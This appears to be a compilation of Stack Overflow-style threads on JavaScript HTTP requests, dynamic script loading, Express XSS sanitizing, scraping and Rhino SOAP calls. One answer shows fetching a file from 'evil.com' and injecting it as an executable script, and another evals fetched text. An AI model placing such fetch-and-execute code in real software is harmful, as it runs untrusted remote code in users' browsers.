New to user-defined functions (UDFs), so excuse me if this is a dumb question.
Can I use a standard HTTP library to make a request FROM a BigQuery function?
Basically, I want to make a function that's available from SQL and that triggers an external service over HTTP.
I've tried both import and require for the http library in my custom function, but both fail when BigQuery runs the JavaScript.
'use strict';
function ping() {
let res = '';
// require() is not available inside BigQuery UDFs, so this line fails:
const http = require('http');
http.get('http://google.com', (resp) => {
resp.on('end', () => {
res = 'pinged';
});
});
return res; // note: this returns before the async callback ever fires
}
Thanks in advance!
As Elliott Brossard said, this isn't possible.
The solution I wound up with is a library of UDF JavaScript functions, plus a second JavaScript library that consumes the same code; the outer library handles all the web-traffic concerns.
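As a rough sketch of that split (all file, function, and URL names here are hypothetical, not from the original setup): keep the shared module free of network calls so it can double as a BigQuery UDF library, and inject the HTTP side only in the outer Node.js wrapper:

```javascript
// Hypothetical shared module: pure functions only, so the same code
// can be registered as BigQuery UDFs and reused from Node.js.
function normalizeId(raw) {
  // Pure transformation -- safe inside a BigQuery UDF.
  return String(raw).trim().toLowerCase();
}

// Outer, Node-only wrapper: handles the HTTP side that BigQuery cannot.
// httpGet is injected so the shared logic stays free of network code.
function notifyService(id, httpGet) {
  const clean = normalizeId(id);
  return httpGet('https://example.com/ping?id=' + encodeURIComponent(clean));
}

module.exports = { normalizeId, notifyService };
```

In tests (or in the outer library), `httpGet` can be any HTTP client; BigQuery only ever sees the pure functions.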
Related
Lower intermediate JS/JQ person here.
I'm trying to escape callback hell by using JS fetch. This is billed as "the replacement for AJAX" and seems to be pretty powerful. I can see how you can get HTML and JSON objects with it... but is it capable of running another JS script from the one you're in? Maybe there's another new function in ES6 to do:
$.getScript( 'xxx.js' );
i.e.
$.ajax({ url : 'xxx.js', dataType : "script", });
...?
Later, in response to Joseph The Dreamer:
Tried this:
const createdScript = $(document.createElement('script')).attr('src', 'generic.js');
fetch( createdScript )...
... it didn't run the script "generic.js". Did you mean something else?
The Fetch API is supposed to provide a promise-based API for fetching remote data. Loading an arbitrary remote script is not AJAX, even if jQuery.ajax is capable of it, so it won't be handled by the Fetch API.
Script can be appended dynamically and wrapped with a promise:
const scriptPromise = new Promise((resolve, reject) => {
const script = document.createElement('script');
script.onload = resolve;
script.onerror = reject;
script.async = true;
script.src = 'foo.js';
document.body.appendChild(script);
});
scriptPromise.then(() => { ... });
SystemJS is supposed to provide promise-based API for script loading and can be used as well:
System.config({
meta: {
'*': { format: 'global' }
}
});
System.import('foo.js').then(() => { ... });
There are a few things to mention here.
Yes, it is possible to execute JavaScript just loaded from the server. You can fetch the file as text and use eval(...), though this is not recommended because of untraceable side effects and lack of security!
Another option would be:
1. Load the javascript file
2. Create a script tag with the file contents (or url, since the browser caches the file)
This works, but it may not free you from callback hell per se.
If what you want is to load other JavaScript files dynamically, you can use, for example, RequireJS; you can define modules and load them dynamically. Take a look at http://requirejs.org/
If you really want to get out of the callback hell, what you need to do is:
Define functions (you can have them in the same file, load them from another file using RequireJS on the client, or use webpack if you can afford a compilation step before deployment)
Use promises or streams if needed (see RxJS: https://github.com/Reactive-Extensions/RxJS)
Remember that promise.then returns a promise
someAsyncThing()
.then(doSomethingAndResolveAnotherAsncThing)
.then(doSomethingAsyncAgain)
Remember that promises can be composed
Promise.all([somePromise, anotherPromise, fetchFromServer])
.then(doSomethingWhenAllOfThoseAreResolved)
Yes, you can:
<script>
fetch('https://evil.com/1.txt').then(function(response) {
if (!response.ok) {
throw new Error('Network response was not ok: ' + response.status);
}
return response.blob();
}).then(function(myBlob) {
var objectURL = URL.createObjectURL(myBlob);
var sc = document.createElement("script");
sc.setAttribute("src", objectURL);
sc.setAttribute("type", "text/javascript");
document.head.appendChild(sc);
})
</script>
Don't listen to the selected "right" answer.
The following fetch() API works perfectly well for me, as proposed in @cnexans' answer (fetching as text and then calling eval()). I noticed increased performance compared to the method of adding the <script> tag.
Run the code snippet to see the fetch() API loading asynchronously (as it is Promise-based):
// Loading moment.min.js as sample script
// only use eval() for sites you trust
fetch('https://momentjs.com/downloads/moment.min.js')
.then(response => response.text())
.then(txt => eval(txt))
.then(() => {
document.getElementById('status').innerHTML = 'moment.min.js loaded'
// now you can use the script
document.getElementById('today').innerHTML = moment().format('dddd');
document.getElementById('today').style.color = 'green';
})
#today {
color: orange;
}
<div id='status'>loading 'moment.min.js' ...</div>
<br>
<div id='today'>please wait ...</div>
The Fetch API provides an interface for fetching resources (including across the network). It will seem familiar to anyone who has used XMLHttpRequest, but the new API provides a more powerful and flexible feature set. https://developer.mozilla.org/en-US/docs/Web/API/Fetch_API
That's what it's supposed to do, but unfortunately it doesn't evaluate the script.
That's why I released this tiny Fetch data loader on GitHub.
It loads the fetched content into a target container and runs its scripts (without using the evil eval() function).
A demo is available here: https://www.ajax-fetch-data-loader.miglisoft.com
Here's a sample code:
<script>
document.addEventListener('DOMContentLoaded', function(event) {
fetch('ajax-content.php')
.then(function (response) {
return response.text()
})
.then(function (html) {
console.info('content has been fetched from data.html');
loadData(html, '#ajax-target').then(function (html) {
console.info('I\'m a callback');
})
}).catch((error) => {
console.log(error);
});
});
</script>
I know this could be a very stupid question but, since I'm totally new to JavaScript, I'm not sure how to do this. I want to write a script and run it through Node on my laptop, and in this script I want to interact with a web page in order to use functions like document.getElementById and so on.
In Python one could do this by using something like Beautiful Soup or requests, but how do you do this in JavaScript?
I have implemented a crawler using cheerio and request-promise as follows:
https://www.npmjs.com/package/cheerio
let request = require('request-promise');
let cheerio = require('cheerio');
request = request.defaults({
transform: function (body) {
return cheerio.load(body);
}
});
// ... omitted
request({uri: 'http://example.org'})
.then($ => {
const element = $('.element-with-class');
});
I'm new to ExpressJS. I have a question about posted JavaScript.
app.get('/nothing/:code',function(req, res) {
var code = req.params.code;
res.send(code)
});
If I POST a javascript tag, it would run. Is there a way to prevent that?
There are many HTML sanitizers out there (a simple search on npm will give you a listing that you can use in your Node.js code).
The simplest would be to use the built-in escape function, but that won't stop many XSS attacks.
app.get('/nothing/:code',function(req, res) {
var code = escape(req.params.code);
res.send(code)
});
A better solution would be to use a library designed for this purpose. For example, you could use the sanitizer library (Google Caja's HTML sanitizer packaged for Node):
var sanitizer = require('sanitizer');
...
app.get('/nothing/:code',function(req, res) {
var code = sanitizer.sanitize(req.params.code);
res.send(code)
});
I'm downloading a webpage using the request module which is very straight forward.
My problem is that the page I'm trying to download has some async scripts (they have the async attribute), and they're not downloaded with the HTML document returned by the HTTP request.
My question is how I can make an HTTP request, with or without (preferably with) the request module, and have the WHOLE page downloaded, without pieces missing due to edge cases like the one described above.
Sounds like you are trying to do web scraping using JavaScript.
Using request is a very fundamental approach which may be too low-level and time-consuming for your needs. The topic is pretty broad, but you should look into more purpose-built modules such as cheerio, x-ray and nightmare.
x-ray will let you select elements directly from the page in a jQuery-like way instead of parsing the whole body.
nightmare provides a modern headless browser which makes it possible for you to enter input as though using the browser manually. With this you should be able to better handle the AJAX-type requests which are causing you problems.
HTH and good luck!
Using only request you could try the following approach to pull the async scripts.
Note: I have tested this with a very basic set up and there is work to be done to make it robust. However, it worked for me:
Test setup
To set up the test I create a html file which includes a script in the body like this: <script src="abc.js" async></script>
Then create temporary server to launch it (httpster)
Scraper
"use strict";
const request = require('request');
const options1 = { url: 'http://localhost:3333/' }
// hard coded script name for test purposes
const options2 = { url: 'http://localhost:3333/abc.js' }
let htmlData = '' // store html page here
request.get(options1)
.on('response', resp => resp.on('data', d => htmlData += d))
.on('end', () => {
let scripts = ''; // store scripts here
// htmlData contains webpage
// Use xml parser to find all script tags with async tags
// and their base urls
// NOT DONE FOR THIS EXAMPLE
request.get(options2)
.on('response', resp => resp.on('data', d => scripts += d))
.on('end', () => {
let allData = htmlData.toString() + scripts.toString();
console.log(allData);
})
.on('error', err => console.log(err))
})
.on('error', err => console.log(err))
This basic example works. You will need to find all the script tags on the page and extract their URLs, which I have not done here.
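The missing extraction step could be sketched like this; the regex approach and the function name are purely illustrative (not from the original answer), and a real HTML parser such as cheerio would be more robust:

```javascript
// Hypothetical helper: pull the src of every <script ... async ...> tag
// out of an HTML string. A regex is fragile compared to a real HTML
// parser (e.g. it can false-match "async" inside attribute values),
// but it is enough for a quick sketch.
function findAsyncScriptSrcs(html) {
  const out = [];
  const tagRe = /<script\b[^>]*\basync\b[^>]*>/gi;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    // Within each matched opening tag, look for a quoted src attribute.
    const srcMatch = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(m[0]);
    if (srcMatch) out.push(srcMatch[1]);
  }
  return out;
}
```

Each URL returned could then be fetched with a further request.get, as in the abc.js example above.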
I'm trying to use the Mozilla/Rhino js engine to test some SOAP requests in the command line. However, none of the normal objects for making requests (XMLHttpRequest, HttpRequest) seem to be available. Why is this? Can I import libraries?
I was able to get it to work using just Rhino with the following code.
var post = new org.apache.commons.httpclient.methods.PostMethod("https://someurl/and/path/");
var client = new org.apache.commons.httpclient.HttpClient();
// ---- Authentication ---- //
var creds = new org.apache.commons.httpclient.UsernamePasswordCredentials("username", "password");
client.getParams().setAuthenticationPreemptive(true);
client.getState().setCredentials(org.apache.commons.httpclient.auth.AuthScope.ANY, creds);
// -------------------------- //
post.setRequestHeader("Content-type", "application/xml");
post.setRequestEntity(new org.apache.commons.httpclient.methods.StringRequestEntity(buildXML(), "text/plain", "ASCII" ));
var status = client.executeMethod(post);
var br = new java.io.BufferedReader(new java.io.InputStreamReader(post.getResponseBodyAsStream()));
var response = "";
var line = br.readLine();
while(line != null){
response = response + line;
line = br.readLine();
}
post.releaseConnection();
You might possibly find a library to import, or you could write your own in Java and make it available to your Rhino instance, depending on how you are using it. Keep in mind Rhino is just a JavaScript language engine. It doesn't have a DOM and is not inherently 'web-aware', so to speak.
However, since it sounds like you are doing this for testing/experimentation purposes, and you will probably be more productive not having to reinvent the wheel to do so, I will strongly, strongly suggest that you just download Node.js and look into the request module (for making HTTP requests) or any of the various SOAP modules.
You can do a ton more with Node.js, but you can also use it as a very simple runner for JavaScript files. Regardless, you should move away from Rhino; it is really old and not well supported anymore, especially now that, with JDK 8, even the javax.script support switches to the Nashorn engine.
UPDATE: If you really want to give it a go (and if you are prepared to monkey around with Java), you might look at this SO question and its answers. But unless you are something of a masochist, I think you'll be happier taking a different path.
I was actually able to do this using Orchestrator 5.1 with the 'Scriptable task' object to interface with the Zabbix API:
var urlObject = new URL(url);
var jsonString = JSON.stringify({ jsonrpc: '2.0', method: 'user.login', params: { user: 'username', password: 'password' }, id: 1 });
urlObject.contentType = "application/json";
result = urlObject.postContent(jsonString);
System.log(result);
var authenticationToken = JSON.parse(result).result;